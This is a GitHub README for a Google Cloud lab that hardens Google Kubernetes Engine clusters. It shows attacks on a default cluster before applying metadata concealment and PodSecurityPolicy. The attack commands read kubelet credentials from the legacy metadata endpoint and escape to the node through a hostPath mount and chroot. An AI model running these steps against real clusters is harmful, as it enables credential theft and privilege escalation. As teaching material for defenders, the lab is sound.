Google Kubernetes Engine Secure Defaults Demo

Introduction

This lab demonstrates some of the security concerns of a default Kubernetes Engine cluster configuration and the corresponding hardening measures to prevent multiple paths of pod escape and cluster privilege escalation. These attack paths are relevant in the following scenarios:

An application flaw in an external facing pod that allows for Server-Side Request Forgery (SSRF) attacks.
A fully compromised container inside a pod allowing for Remote Command Execution (RCE).
A malicious internal user or an attacker with a set of compromised internal user credentials with the ability to create/update a pod in a given namespace.

The following security settings will be tested in both disabled and enabled states to demonstrate the real-world implications of these configurations:

Disabling the Legacy GCE Metadata API Endpoint
Enabling Metadata Concealment
Enabling and configuring PodSecurityPolicy

Objectives

Upon completion of this lab you will understand the need for protecting the GKE Instance Metadata and defining appropriate PodSecurityPolicy policies for your environment.

You will:

Create a small GKE cluster in an existing GCP project.
Validate the most common paths of pod escape and cluster privilege escalation from the perspective of a malicious internal user.
Harden the GKE cluster for these issues by attaching a new node pool with improved security settings.
Validate the cluster no longer allows for each of those actions to occur.

Prerequisites

Access to an existing Google Cloud project with the Kubernetes Engine service enabled. If you do not have a Google Cloud account, please signup for a free trial here.
A Google Cloud account and project is required for this demo. The project must have the proper quota to run a Kubernetes Engine cluster with at least 3 vCPUs and 10GB of RAM. How to check your account's quota is documented here: quotas.

Supported Operating Systems

This demo can be run from MacOS, Linux, or, alternatively, directly from Google Cloud Shell. The latter option is the simplest as it only requires browser access to GCP and no additional software is required. Instructions for both alternatives can be found below.

Deploying Demo from Google Cloud Shell

NOTE: This section can be skipped if the cloud deployment is being performed without Cloud Shell, for instance from a local machine or from a server outside GCP.

Google Cloud Shell is a browser-based terminal that Google provides to interact with your GCP resources. It is backed by a free Compute Engine instance that comes with many useful tools already installed, including everything required to run this demo.

Click the button below to open the demo in your Cloud Shell:

To prepare gcloud for use in Cloud Shell, execute the following command in the terminal at the bottom of the browser window you just opened:

gcloud init

Respond to the prompts and continue with the following deployment instructions. The prompts will include the account you want to run as, the current project, and, optionally, the default region and zone. These configure Cloud Shell itself-the actual project, region, and zone, used by the demo will be configured separately below.

Deploying the Demo without Cloud Shell

NOTE: If the demo is being deployed via Cloud Shell, as described above, this section can be skipped.

For deployments without using Cloud Shell, you will need to have access to a computer providing a bash shell with the following tools installed:

Use git to clone this project to your local machine:

git clone https://github.com/GoogleCloudPlatform/gke-secure-defaults-demo

When downloading is complete, change your current working directory to the new project:

cd gke-secure-defaults-demo

Continue with the instructions below, running all commands from this directory.

Deployment Steps

NOTE: The following instructions are applicable for deployments performed both with and without Cloud Shell.

To deploy the cluster, execute the following command:

./create.sh -c default-cluster

Replace the text default-cluster the name of the cluster that you would like to create.

The create script will output the following message when complete:

...snip...
NAME          LOCATION    MASTER_VERSION  MASTER_IP     MACHINE_TYPE   NODE_VERSION  NUM_NODES  STATUS
default-cluster  us-central1-a  1.12.8-gke.6    34.66.214.195  n1-standard-1  1.12.8-gke.6  2          RUNNING
Fetching cluster endpoint and auth data.
kubeconfig entry generated for default-cluster.

The script will:

Enable the necessary APIs in your project. Specifically, compute and container.
Create a new Kubernetes Engine cluster in your current ZONE, VPC and network that omits configuring the GKE Metadata Concealment proxy and does not enable the setting to block access to the Legacy Compute Metadata API.
Retrieve your cluster credentials to enable kubectl usage.

After the cluster is created successfully, check your installed version of Kubernetes using the kubectl version command:

kubectl version

Client Version: version.Info{Major:"1", Minor:"14", GitVersion:"v1.14.3", GitCommit:"5e53fd6bc17c0dec8434817e69b04a25d8ae0ff0", GitTreeState:"clean", BuildDate:"2019-06-06T01:44:30Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"darwin/amd64"}
Server Version: version.Info{Major:"1", Minor:"12+", GitVersion:"v1.12.8-gke.10", GitCommit:"f53039cc1e5295eed20969a4f10fb6ad99461e37", GitTreeState:"clean", BuildDate:"2019-06-19T20:48:40Z", GoVersion:"go1.10.8b4", Compiler:"gc", Platform:"linux/amd64"}

Your kubectl version (Client) should be within two minor releases of the GKE cluster created (Server).

Run a Google Cloud-SDK pod

From your Cloud Shell prompt, launch a single instance of the Google Cloud-SDK container that will be automatically removed after exiting from the shell:

kubectl run -it --generator=run-pod/v1 --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

This will take a few moments to complete.

You should now have a bash shell inside the pod's container:

root@gcloud:/#

It may take a few seconds for the container to be started and the command prompt to be displayed. If you don't see a command prompt, try pressing Enter.

Explore the Legacy Compute Metadata Endpoint

In GKE Clusters created with version 1.11 or below, the "Legacy" or v1beta1 Compute Metadata endpoint is available by default. Unlike the current Compute Metadata version, v1, the v1beta1 Compute Metadata endpoint does not require a custom HTTP header to be included in all requests. On new GKE Clusters created at version 1.12 or greater, the legacy Compute Engine metadata endpoints are now disabled by default. For more information, see: Protecting Cluster Metadata

Run the following command to access the "Legacy" Compute Metadata endpoint without requiring a custom HTTP header to get the GCE Instance name where this pod is running:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/name && echo

gke-default-cluster-default-pool-b57a043a-6z5v

The && echo command is to aid with terminal formatting and output readability. Now, re-run the same command, but instead use the v1 Compute Metadata endpoint:

curl -s http://metadata.google.internal/computeMetadata/v1/instance/name && echo

...snip...
Your client does not have permission to get URL <code>/computeMetadata/v1/instance/name</code> from this server. Missing Metadata-Flavor:Google header.
...snip...

Notice how it returns an error stating that it requires the custom HTTP header to be present. Add the custom header on the next run and retrieve the GCE instance name that is running this pod:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name && echo

gke-default-cluster-default-pool-b57a043a-6z5v

Without requiring a custom HTTP header when accessing the GCE Instance Metadata endpoint, a flaw in an application that allows an attacker to trick the code into retrieving the contents of an attacker-specified web URL could provide a simple method for enumeration and potential credential exfiltration. By requiring a custom HTTP header, the attacker needs to exploit an application flaw that allows them to control the URL and also add custom headers in order to carry out this attack successfully.

Keep this shell inside the pod available for the next step. If you accidentally exit from the pod, simply re-run:

kubectl run -it --generator=run-pod/v1 --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

Explore the GKE node bootstrapping credentials

From inside the same pod shell, run the following command to list the attributes associated with the underlying GCE instances. Be sure to include the trailing slash:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/

Perhaps the most sensitive data in this listing is kube-env. It contains several variables which the kubelet uses as initial credentials when attaching the node to the GKE cluster. The variables CA_CERT, KUBELET_CERT, and KUBELET_KEY contain this information and are therefore considered sensitive to non-cluster administrators.

To see the potentially sensitive variables and data, run the following command:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env

Therefore, in any of the following situations:

A flaw that allows for SSRF in a pod application
An application or library flaw that allow for RCE in a pod
An internal user with the ability to create or exec into a pod

There exists a high likelihood for compromise and exfiltration of sensitive kubelet bootstrapping credentials via the Compute Metadata endpoint. With the kubelet credentials, it is possible to leverage them in certain circumstances to escalate privileges to that of cluster-admin and therefore have full control of the GKE Cluster including all data, applications, and access to the underlying nodes.

Leverage the Permissions Assigned to this Node Pool's Service Account

By default, GCP projects with the Compute API enabled have a default service account in the format of NNNNNNNNNN-compute@developer.gserviceaccount.com in the project and the Editor role attached to it. Also by default, GKE clusters created without specifying a service account will utilize the default Compute service account and attach it to all worker nodes.

Run the following curl command to list the OAuth scopes associated with the service account attached to the underlying GCE instance:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring
https://www.googleapis.com/auth/service.management.readonly
https://www.googleapis.com/auth/servicecontrol
https://www.googleapis.com/auth/trace.append

The combination of authentication scopes and the permissions of the service account dictates what applications on this node can access. The above list is the minimum scopes needed for most GKE clusters, but some use cases require increased scopes.

If the authentication scope were to be configured during cluster creation to include https://www.googleapis.com/auth/cloud-platform, this would allow any GCP API to be considered "in scope", and only the IAM permissions assigned to the service account would determine what can be accessed. If the default service account is in use and the default IAM Role of Editor was not modified, this effectively means that any pod on this node pool has Editor permissions to the GCP project where the GKE cluster is deployed. As the Editor IAM Role has a wide range of read/write permissions to interact with resources in the project such as Compute instances, GCS buckets, GCR registries, and more, this is most likely not desired.

Exit out of this pod by typing:

exit

Deploy a pod that mounts the host filesystem

One of the simplest paths for "escaping" to the underlying host is by mounting the host's filesystem into the pod's filesystem using standard Kubernetes volumes and volumeMounts in a Pod specification.

To demonstrate this, run the following to create a Pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

kubectl apply -f manifests/hostpath.yml

Run kubectl get pod and re-run until it's in the "Running" state:

kubectl get pod

NAME       READY   STATUS    RESTARTS   AGE
hostpath   1/1     Running   0          30s

Explore and compromise the underlying host

Run the following to obtain a shell inside the pod you just created:

kubectl exec -it hostpath -- bash

Switch to the pod shell's root filesystem point to that of the underlying host:

chroot /rootfs /bin/bash

hostpath / #

With those simple commands, the pod is now effectively a root shell on the node. You are now able to do the following:

run the standard docker command with full permissions	`docker ps`
list all local docker images	`docker images`
`docker run` privileged container of your choosing	`docker run --privileged <imagename>:<imageversion>`
examine the Kubernetes secrets mounted on the node	`mount \| grep volumes \| awk '{print $3}' \| xargs ls`
`exec` into any running container (even into another pod in another namespace)	`docker exec -it <docker container ID> sh`

Nearly every operation that the root user can perform is available to this pod shell. This includes persistence mechanisms like adding SSH users/keys, running privileged docker containers on the host outside the view of Kubernetes, and much more.

To exit the pod shell, run exit twice - once to leave the chroot and another to leave the pod's shell:

exit

exit

Now you can delete the hostpath pod:

kubectl delete -f manifests/hostpath.yml

pod "hostpath" deleted

Understand the available controls

The next steps of this demo will cover:

Disabling the Legacy GCE Metadata API Endpoint - By specifying a custom metadata key and value, the v1beta1 metadata endpoint will no longer be available from the instance.
Enable Metadata Concealment - Passing an additional configuration during cluster and/or node pool creation, a lightweight proxy will be installed on each node that proxies all requests to the Metadata API and prevents access to sensitive endpoints.
Enable and configure PodSecurityPolicy - Configuring this option on a GKE cluster will add the PodSecurityPolicy Admission Controller which can be used to restrict the use of insecure settings during Pod creation. In this demo's case, preventing containers from running as the root user and having the ability to mount the underlying host filesystem.

Deploy a second node pool

To enable you to experiment with and without the Metadata endpoint protections in place, you'll create a second node pool that includes two additional settings. Pods that are scheduled to the generic node pool will not have the protections, and Pods scheduled to the second node pool will have them enabled.

Note: In GKE versions 1.12 and newer, the --metadata=disable-legacy-endpoints=true setting will automatically be enabled. The next command is defining it explicitly for clarity.

Create the second node pool:

./second-pool.sh -c default-cluster

NAME         MACHINE_TYPE   DISK_SIZE_GB  NODE_VERSION
second-pool  n1-standard-1  100           1.12.8-gke.6

Run a Google Cloud-SDK pod

In Cloud Shell, launch a single instance of the Google Cloud-SDK container that will be run only on the second node pool with the protections enabled and not run as the root user.

kubectl run -it --generator=run-pod/v1 --rm gcloud --image=google/cloud-sdk:latest --restart=Never --overrides='{ "apiVersion": "v1", "spec": { "securityContext": { "runAsUser": 65534, "fsGroup": 65534 }, "nodeSelector": { "cloud.google.com/gke-nodepool": "second-pool" } } }' -- bash

You should now have a bash shell inside the pod's container running on the node pool named second-pool. You should see the following:

nobody@gcloud:/$

It may take a few seconds for the container to be started and the command prompt to be displayed.

If you don't see a command prompt, try pressing Enter.

Explore various blocked endpoints

With the configuration of the second node pool set to --metadata=disable-legacy-endpoints=true, the following command will now fail as expected:

curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/name

...snip...
Legacy metadata endpoints are disabled. Please use the /v1/ endpoint.
...snip...

With the configuration of the second node pool set to --workload-metadata-from-node=SECURE , the following command to retrieve the sensitive file, kube-env, will now fail:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env

This metadata endpoint is concealed.

But other commands to non-sensitive endpoints will still succeed if the proper HTTP header is passed:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name && echo

gke-default-cluster-second-pool-8fbd68c5-gzzp

Exit out of the pod:

exit

You should now be back to your shell.

Deploy PodSecurityPolicy objects

In order to have the necessary permissions to proceed, grant explicit permissions to your own user account to become cluster-admin:

kubectl create clusterrolebinding clusteradmin --clusterrole=cluster-admin --user="$(gcloud config list account --format 'value(core.account)')"

clusterrolebinding.rbac.authorization.k8s.io/clusteradmin created

Next, deploy a more restrictive PodSecurityPolicy on all authenticated users in the default namespace:

kubectl apply -f manifests/restrictive-psp.yml

podsecuritypolicy.extensions/restrictive-psp created

Next, add the ClusterRole that provides the necessary ability to "use" this PodSecurityPolicy.

kubectl apply -f manifests/restrictive-psp-clusterrole.yml

clusterrole.rbac.authorization.k8s.io/restrictive-psp created

Finally, create a RoleBinding in the default namespace that allows any authenticated user permission to leverage the PodSecurityPolicy.

kubectl apply -f manifests/restrictive-psp-clusterrolebinding.yml

rolebinding.rbac.authorization.k8s.io/restrictive-psp created

Note: In a real environment, consider replacing the system:authenticated user in the ClusterRoleBinding or Namespace RoleBinding with the specific user or service accounts that you want to have the ability to create pods in the default namespace.

Enable PodSecurity policy

Next, enable the PodSecurityPolicy Admission Controller:

./enable-psp.sh -c default-cluster

This will take a few minutes to complete.

Deploy a blocked pod that mounts the host filesystem

Because the account used to deploy the GKE cluster was granted cluster-admin permissions in a previous step, it's necessary to create another separate "user" account to interact with the cluster and validate the PodSecurityPolicy enforcement. To do this, run:

./create-demo-developer.sh -c default-cluster

Created service account [demo-developer].
...snip...
Fetching cluster endpoint and auth data.
kubeconfig entry generated for default-cluster.

The create-demo-developer.sh script will create a new service account named demo-developer, grant that service account the container.developer IAM role, create a service account key, configure gcloud to use that service account key, and then configure kubectl to use those service account credentials when communicating with the cluster.

Now, try to create another pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

kubectl apply -f manifests/hostpath.yml

This output validatates that it's blocked by PSP:

Error from server (Forbidden): error when creating "STDIN": pods "hostpath" is forbidden: unable to validate against any pod security policy: [spec.volumes[0]: Invalid value: "hostPath": hostPath volumes are not allowed to be used]

Deploy another pod that meets the criteria of the restrictive-psp:

kubectl apply -f manifests/nohostpath.yml

pod/nohostpath created

To view the annotation that gets added to the pod indicating which PodSecurityPolicy authorized the creation, run:

kubectl get pod nohostpath -o=jsonpath="{ .metadata.annotations.kubernetes\.io/psp }" && echo

restrictive-psp

Congratulations! In this lab you configured a default Kubernetes cluster in Google Kubernetes Engine. You then probed and exploited the access available to your pod, hardened the cluster, and validated those malicious actions were no longer possible.

Validation

The following script will validate that the demo is deployed correctly:

./validate.sh -c default-cluster

Replace the text default-cluster the name of the cluster that you would like to validate. If the script fails it will output:

Fetching cluster endpoint and auth data.
kubeconfig entry generated for default-cluster.

Tear Down

Log back in as your user account.

gcloud auth login

The following script will destroy the Kubernetes Engine cluster.

./delete.sh -c default-cluster

Fetching cluster endpoint and auth data.
kubeconfig entry generated for default-cluster.
Deleting cluster
Deleting cluster default-cluster...
...snip...
deleted service account [demo-developer@my-project-id.iam.gserviceaccount.com]

Replace the text default-cluster the name of the cluster that you would like to delete.

Troubleshooting

Errors about project quotas

If you get errors about quotas, please increase your quota in the project. See here for more details.

Relevant Materials

Note, this is not an officially supported Google product.

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
manifests		manifests
test		test
.gitignore		.gitignore
CONTRIBUTING.md		CONTRIBUTING.md
Jenkinsfile		Jenkinsfile
LICENSE		LICENSE
Makefile		Makefile
OWNERS		OWNERS
README.md		README.md
common.sh		common.sh
create-demo-developer.sh		create-demo-developer.sh
create.sh		create.sh
delete.sh		delete.sh
enable-psp.sh		enable-psp.sh
second-pool.sh		second-pool.sh
validate.sh		validate.sh

License

GoogleCloudPlatform/gke-secure-defaults-demo

Folders and files

Latest commit

History

Repository files navigation

Google Kubernetes Engine Secure Defaults Demo

Table of Contents

Introduction

Objectives

Prerequisites

Supported Operating Systems

Deploying Demo from Google Cloud Shell

Deploying the Demo without Cloud Shell

Deployment Steps

Run a Google Cloud-SDK pod

Explore the Legacy Compute Metadata Endpoint

Explore the GKE node bootstrapping credentials

Leverage the Permissions Assigned to this Node Pool's Service Account

Deploy a pod that mounts the host filesystem

Explore and compromise the underlying host

Understand the available controls

Deploy a second node pool

Run a Google Cloud-SDK pod

Explore various blocked endpoints

Deploy PodSecurityPolicy objects

Enable PodSecurity policy

Deploy a blocked pod that mounts the host filesystem

Validation

Tear Down

Troubleshooting

Errors about project quotas

Relevant Materials

About

Topics

Resources

License

Stars

Watchers

Forks

Languages